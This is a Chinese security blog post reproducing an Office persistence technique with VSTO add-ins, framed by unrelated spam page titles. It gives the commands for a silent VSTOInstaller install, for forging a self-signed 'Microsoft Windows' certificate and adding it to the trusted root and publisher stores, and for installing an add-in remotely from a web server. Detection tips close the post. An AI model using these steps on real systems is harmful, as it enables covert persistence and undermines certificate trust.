刑事辩护的目的在于说服法官Office 2016新增图表装逼指南【必读】Office 2016新增图表装逼指南

利用VSTO实现的office后门 – 3gstudent – Good in study, attitude and health

VSTO 学习笔记(十)Office 2010 Ribbon开发
Ray Ozzie Letter
《Office2013快速入门指南全攻略》微软官方下载
0x00 前言

最近看了一篇文章《VSTO: The Payload Installer That Probably Defeats Your Application Whitelisting Rules》,介绍了利用VSTO实现Office后门的方法,我在之前的文章《Use Office to maintain persistence》和《Office Persistence on x64 operating system》曾对Office的后门进行过学习,本文将结合自己的研究心得,对该方法进行复现,分析利用思路,分享实际利用方法,最后介绍如何识别这种后门。

文章地址:

https://bohops.com/2018/01/31/vsto-the-payload-installer-that-probably-defeats-your-application-whitelisting-rules/

0x01 简介

本文将要介绍以下内容:

VSTO的编写方法 实际利用思路 后门检测0x02 VSTO的编写方法1、VSTO简介

全称Visual Studio Tools for Office

用来定制Office应用程序,能够同office控件交互

集成在Visual Studio安装包中

如下图

2、VSTO开发

本节内容是对《VSTO: The Payload Installer That Probably Defeats Your Application Whitelisting Rules》的复现

(1) 新建工程

Visual c# -> Office -> Word 2010外接程序

如下图

(2) 添加代码

添加引用System.Windows.Forms

添加弹框代码:

using System.Windows.Forms;MessageBox.Show("1");

如下图

(3) 编译

设置对应.Net版本,编译,生成如下6个文件:

Microsoft.Office.Tools.Common.v4.0.Utilities.dll Microsoft.Office.Tools.Common.v4.0.Utilities.xml WordAddIn2.dll WordAddIn2.dll.manifest WordAddIn2.pdb WordAddIn2.vsto(4) 安装插件

执行WordAddIn2.vsto

弹框提示无法验证发行者,如下图

选择安装

查看控制面板 -> 程序 -> 程序和功能,能够找到新安装的插件

#### (5) 打开word.exe,自动加载插件

弹框,如下图

查看Word加载项,能够看到加载插件WordAddIn2,如下图

至此,成功实现Office后门的安装

0x03 实际利用思路

对于实际利用,首先需要满足安装过程无界面,所以要绕过弹框提示无法验证发行者,需要做如下改进:

(1) 命令行安装VSTO插件

使用VSTOInstaller.exe

系统安装Office后包含,默认路径%ProgramFiles%\Common Files\microsoft shared\VSTO\10.0

参数说明:

/i: 安装

/u: 卸载

/s: 静默操作,如果需要信任提示,将不会安装或更新自定义项

安装参数如下:

"C:\Program Files\Common Files\microsoft shared\VSTO\10.0\VSTOInstaller.exe" /i /s c:\test\WordAddIn2

由于信任提示,无法验证发行者,所以安装失败

(2) 绕过验证发行者

VSTO插件提供签名功能,如下图

手动生成一组签名证书,使用如下工具

makecert.exe cert2spc.exe pvk2pfx.exe certmgr.exe

来自于Windows SDK,可供参考下载的地址:

https://github.com/3gstudent/signtools

生成命令:

makecert -n "CN=Microsoft Windows" -r -sv Root.pvk Root.cercert2spc Root.cer Root.spcpvk2pfx -pvk Root.pvk -pi 12345678password -spc Root.spc -pfx Root.pfx -f

执行后生成Root.cer、Root.pfx、Root.pvk、Root.spc四个文件

替换插件WordAddIn2的证书,如下图

证书注册(管理员权限):

certmgr.exe -add Root.cer -c -s -r localMachine TrustedPublishercertmgr.exe -add -c Root.cer -s -r localmachine root

注:

需要将证书同时添加到TrustedPublisherroot

再次安装VSTO插件,不会被拦截

(3) 远程安装

VSTOInstaller.exe支持远程安装

可以将VSTO插件放在远程Web服务器上

安装参数如下:

"C:\Program Files\Common Files\microsoft shared\VSTO\10.0\VSTOInstaller.exe" /s /i http://192.168.62.131/1/WordAddIn1.vsto

综上,实际利用过程如下:

生成VSTO插件 为插件添加签名 证书注册 远程下载安装0x04 后门检测

1、查看控制面板 -> 程序 -> 程序和功能,是否有可疑插件

注:

VSTO插件并不会在注册表卸载配置的位置(HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\)创建新键值

2、查看Office的COM加载项

注:

禁用宏并不会阻止VSTO插件的加载

0x05 小结

本文测试了利用VSTO实现Office后门的方法,结合实际利用思路,分析检测方法

LEAVE A REPLY

责任编辑:刑事辩护的目的在于说服法官